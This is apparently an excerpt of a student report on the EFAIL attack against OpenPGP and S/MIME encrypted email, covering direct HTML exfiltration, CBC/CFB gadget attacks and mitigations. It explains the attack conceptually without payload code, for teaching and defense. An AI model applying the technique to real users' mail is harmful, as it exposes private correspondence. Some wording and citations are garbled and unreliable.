E-Fail

Summary

The E-FAIL attack takes use of flaws in the OpenPGP and S/MIME protocols to reveal the plaintext of encrypted emails. In short, EFAIL abuses the active content in HTML emails, such as externally loaded images or styles, and leaks plaintext via the requested URL. To create these exfiltration channels, the attacker must first access encrypted emails by, for example, eavesdropping on network traffic, destroying email accounts, email servers, backup systems or client computers. These emails may even have been collected many years ago. The attacker modifies the encrypted email in some way and sends the modified encrypted email to the victim. The victim’s email client decrypts the email and loads all external content to reveal the plaintext to the attacker.

Direct Exfiltration Channels in Email Clients

Direct Exfiltration attacks exploit vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird to directly leak the plaintext of encrypted emails. These vulnerabilities can be fixed in the corresponding email client. The attacker creates a new multipart email with three paragraphs of text, as shown below 3.3 . The first is a piece of HTML text that is essentially an HTML image tag. Note that the src attribute of this image tag is opened with quotes, not closed. The second body contains PGP or S/MIME ciphertext. The third is also an HTML body part that disables the src attribute of the first body part

This email is then sent to the victim by the assailant. The client of the victim decrypts the second encrypted body part and inserts the three body parts into the HTML email as illustrated below. 3.4. Note that the src attribute of the image tag in line 1 is disabled in line 4, so the URL includes all four lines.

Figure 3.4: HTML-Email [Uni21d]

Then, the email client URL encodes all non-printable characters (e.g. ”20” is a space) and requests the image from that URL. Because the plaintext of the encrypted email is contained in the URL route, the victim’s email client delivers the plaintext to the attacker. Direct exfiltration EFAIL attacks are applicable to PGP and S/MIME encrypted emails.

Figure 3.5: Vulnerable email programs to the knowledge of the security researchers who discovered the Efail vulnerability. [PDM+18]

The CBC/CFB-Gadget-Attack

First, we’ll go through the new CBC/CFB gadget attacks, which take use of flaws in the OpenPGP and S/MIME specifications to steal plaintext.The concept of CBC gadget in S/MIME is depicted in the diagram below. An attacker can precisely edit plaintext blocks if they know the plaintext due to the characteristics of the CBC mode of operation. As seen in 3.1 (a), S/MIME-encrypted emails frequently begin with ”Content type: multipart/signed,” indicating that the attacker has at least one complete plaintext block. It can then create a canonical plaintext block with zeros as its content, as seen in 3.1 (b). The block pair X and C 0a is referred to as a CBC device. It then appends CBC gadgets to the encrypted plaintext to insert an image tag in step 3.1 (c). When the user opens the attacker email, this creates a single piece of encrypted text that exfiltrates its own plaintext. OpenPGP employs the CFB mode of operation, which has cryptographic features that are extremely similar to CBC and allows the same attack to be carried out with CFB gadgets. The distinction is that any standard-conforming client will be vulnerable, and each vendor will be free to devise their own mitigations, which may or may not prevent the attacks. As a result, it will be important to update the specification in the long run in order to uncover and record changes that address the underlying primary causes of the vulnerabilities.

Despite the fact that the CBC/CFB gadget attacks on PGP and S/MIME are theoretically similar, the conditions for a successful attack differ significantly. Attacking S/MIME is simple, because by sending a single designed S/MIME email to the target, an attacker can break several (in our experiments, up to 500) S/MIME encrypted emails. Modern OpenPGP implementations, unlike S/MIME, include a Modification Detection Code (MDC) that may identify modified plaintexts and so prevent the CFB gadget attack. However, we discovered that several clients only displayed the updated plaintext after issuing a warning to the user for invalid MDCs.

Despite the MDC, the CFB gadget attack was possible. PGP also compresses the plaintext before encrypting it, making guessing known plaintext bytes more difficult. Based on our current findings, the CFB device attack against PGP has a success rate of about one out of every three attempts. Plaintext compression, we believe, is more of a technical snag than a fundamental restriction of the EFAIL attacks, and that further research will make the attacks more efficient.

Mitigations

To continue using email encryption securely, users must implement the following points To prevent EFAIL attacks. This section is divided in to three terms to visualize the urgency of each implementation.

Short-Term

Active content in the email client must be disabled. This includes HTML code execu- tion and the reloading of external material, which is frequently authorized for aesthetic reasons. E-mail servers and e-mail clients must be secured against unauthorized access attempts.Moreover, in the case of OpenPGP, you can decrypt the e-mails in an external program instead of in the mail client, so that an attack comes to nothing. Short term: No decryption in email client. Decrypting S/MIME or PGP emails in a separate program outside of your email client is the easiest strategy to avoid EFAIL attacks. Decrypt incoming encrypted emails by copy and pasting the ciphertext into a different program that handles the decryption for you after deleting your S/MIME and PGP private keys from your email client. In this manner, email clients are unable to initiate exfiltration channels. This is currently the safest option with the downside that the process gets more involved. Short term: Disable HTML rendering. The EFAIL attacks target active content, which is often in the form of HTML pictures, styles, and other elements. The most common approach of fighting EFAIL is to disable the rendering of incoming HTML emails in your email client. It’s worth noting that email clients have other possible backchannels that aren’t linked to HTML, but they’re more difficult to attack.

Mid-Term

Mid term: Update E-Mail client. Vendors of the email clients will publish patches that either fix the E-Fail vulnerabilities or make them much harder to exploit.

Long-Term

Long term: Update OpenPGP and S/MIME standards. The EFAIL attacks exploit flaws and undefined behavior in the MIME, S/MIME, and OpenPGP standards.As a result, standards must be changed, which will take time. Update: Our advice to dep- recate the SE packet type and not show updated ciphertexts is reflected in the current draft of OpenPGP RFC4880.[CalAD] The CFB gadget attacks can also be prevented by updates, the programs just have to evaluate the MDC correctly (which GnuPG does by now, an error in the MDC check now leads to termination) and reject the outdated SE packets so that the attacks are no longer possible. The CBC gadget attacks cannot be properly prevented until an updated S/MIME standard is released. Until that time comes, individual developers will have to develop their own solutions 11

Conclusion

References

CalAD] J. Callas. Rfc4880, Nov 200AD. URL: https://datatracker.ietf.org/ doc/html/rfc4880. 11 [Cor19] MITRE Corporation, 2019. URL: https://cve.mitre.org/cgi-bin/ cvename.cgi?name=CVE-2019-13050. 7 [Gar96] Simson Garfinkel. PGP: Pretty good privacy. O’Reilly, Internat. Thomson- Verl, 1996. 5 [MKP+17] Juan Ram ́on Ponce Mauri ́es, Kat Krol, Simon Parkin, Ruba Abu-Salma, and M. Angela Sasse. Dead on arrival: Recovering from fatal flaws in email encryption tools. In The LASER Workshop: Learning from Author- itative Security Experiment Results (LASER 2017), pages 49–57. USENIX Association, October 2017. URL: https://www.usenix.org/conference/ laser2017/presentation/mauries. 12 [OAS21] OASIS. How email really works, 2021. [Online; accessed December 05, 2021]. URL: https://www.oasis-open.org/khelp/kmlm/user_help/ html/images/howemailworks.png. 4 [PDM+18] Damian Poddebniak, Christian Dresen, Jens Mueller, Fabian Ising, Sebas- tian Schinzel, Simon Friedberger, Juraj Somorovsky, and Joerg Schwenk. Efail: Breaking S/MIME and OpenPGP email encryption using exfil- tration channels. In 27th USENIX Security Symposium (USENIX Secu- rity 18), pages 549–566, Baltimore, MD, August 2018. USENIX Associ- ation. URL: https://www.usenix.org/conference/usenixsecurity18/ presentation/poddebniak. 9 [Pos] J Postel. Simple mail transfer protocol. URL: https://tools.ietf.org/ html/rfc821/. 3 [Pur21] PurpleSec. 2021 ransomware statistics, Aug 2021. URL: https:// purplesec.us/resources/cyber-security-statistics/ransomware/. 6 [Ram99] B. Ramsdell. Rfc2633, Jun 1999. URL: https://datatracker.ietf.org/ doc/html/rfc2633. 4 [Rhe13] Man Rhee. Electronic Mail Security: PGP, S/MIME, pages 353–385. Wikey, 03 2013. doi:10.1002/9781118512920.ch10. 1 14 Bibliography [Spi16] Dag Spicer. Raymond tomlinson: Email pioneer, part 1. IEEE Annals of the History of Computing, 38:72–79, 04 2016. doi:10.1109/MAHC.2016.25. 1 [TR10] S Turner and B Ramsdell. Rfc5751, Jan 2010. URL: https:// datatracker.ietf.org/doc/html/rfc5751. 4 [Uni21a] University of Applied Sciences M ̈unster. Cbc gadgets in s/mime, 2021. [Online; accessed December 05, 2021]. URL: https://efail.de/media/ img/smime-attack.png. 8 [Uni21b] University of Applied Sciences M ̈unster. Direct exfiltration, 2021. [On- line; accessed December 05, 2021]. URL: https://efail.de/media/img/ exfil1.png. 8 [Uni21c] University of Applied Sciences M ̈unster. Direct exfiltration, 2021. [On- line; accessed December 05, 2021]. URL: https://efail.de/media/img/ exfil2.png. 9 [Uni21d] University of Applied Sciences M ̈unster. Direct exfiltration, 2021. [On- line; accessed December 05, 2021]. URL: https://efail.de/media/img/ exfil3.png. 9